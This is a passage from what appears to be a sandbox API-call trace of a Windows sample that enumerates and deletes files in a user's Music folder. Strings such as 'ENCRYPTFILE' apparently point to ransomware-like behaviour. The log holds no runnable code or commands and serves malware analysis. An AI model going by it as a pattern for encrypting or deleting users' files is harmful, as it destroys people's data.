(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e298 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0117.992] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fdfec0, ftCreationTime.dwHighDateTime=0x1d5e49e, ftLastAccessTime.dwLowDateTime=0x978232c0, ftLastAccessTime.dwHighDateTime=0x1d5ea3b, ftLastWriteTime.dwLowDateTime=0x978232c0, ftLastWriteTime.dwHighDateTime=0x1d5ea3b, nFileSizeHigh=0x0, nFileSizeLow=0x747e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="KxIfNFq_eT6K4Yywd.m4a", cAlternateFileName="KXIFNF~1.M4A")) returned 0x41ac180 [0117.992] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\kxifnfq_et6k4yywd.m4a")) returned 1 [0118.005] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fdfec0, ftCreationTime.dwHighDateTime=0x1d5e49e, ftLastAccessTime.dwLowDateTime=0x978232c0, ftLastAccessTime.dwHighDateTime=0x1d5ea3b, ftLastWriteTime.dwLowDateTime=0x978232c0, ftLastWriteTime.dwHighDateTime=0x1d5ea3b, nFileSizeHigh=0x0, nFileSizeLow=0x747e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="KxIfNFq_eT6K4Yywd.m4a", cAlternateFileName="KXIFNF~1.M4A")) returned 0 [0118.005] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0118.006] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0118.006] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0118.006] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.006] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0118.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0118.006] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0118.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23d0 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0118.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0118.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0118.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0118.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0118.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0118.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0118.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0b8 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0118.007] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0118.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0118.008] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0118.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0118.008] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38ea4ef0, ftCreationTime.dwHighDateTime=0x1d5e0e5, ftLastAccessTime.dwLowDateTime=0x944918e0, ftLastAccessTime.dwHighDateTime=0x1d5e53a, ftLastWriteTime.dwLowDateTime=0x944918e0, ftLastWriteTime.dwHighDateTime=0x1d5e53a, nFileSizeHigh=0x0, nFileSizeLow=0xb9fc, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="lJ_RJDQgish84bCgxK.wav", cAlternateFileName="LJ_RJD~1.WAV")) returned 0x41ac780 [0118.008] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0118.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0118.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0118.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0118.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0118.008] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0118.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0118.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0118.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0118.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0118.009] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0118.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0118.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0118.010] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0118.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0118.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0118.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0118.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0118.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0118.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0118.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0118.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0118.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0118.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0118.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0118.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0118.013] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0118.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0118.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0118.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0118.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0118.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0118.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0118.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0118.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, 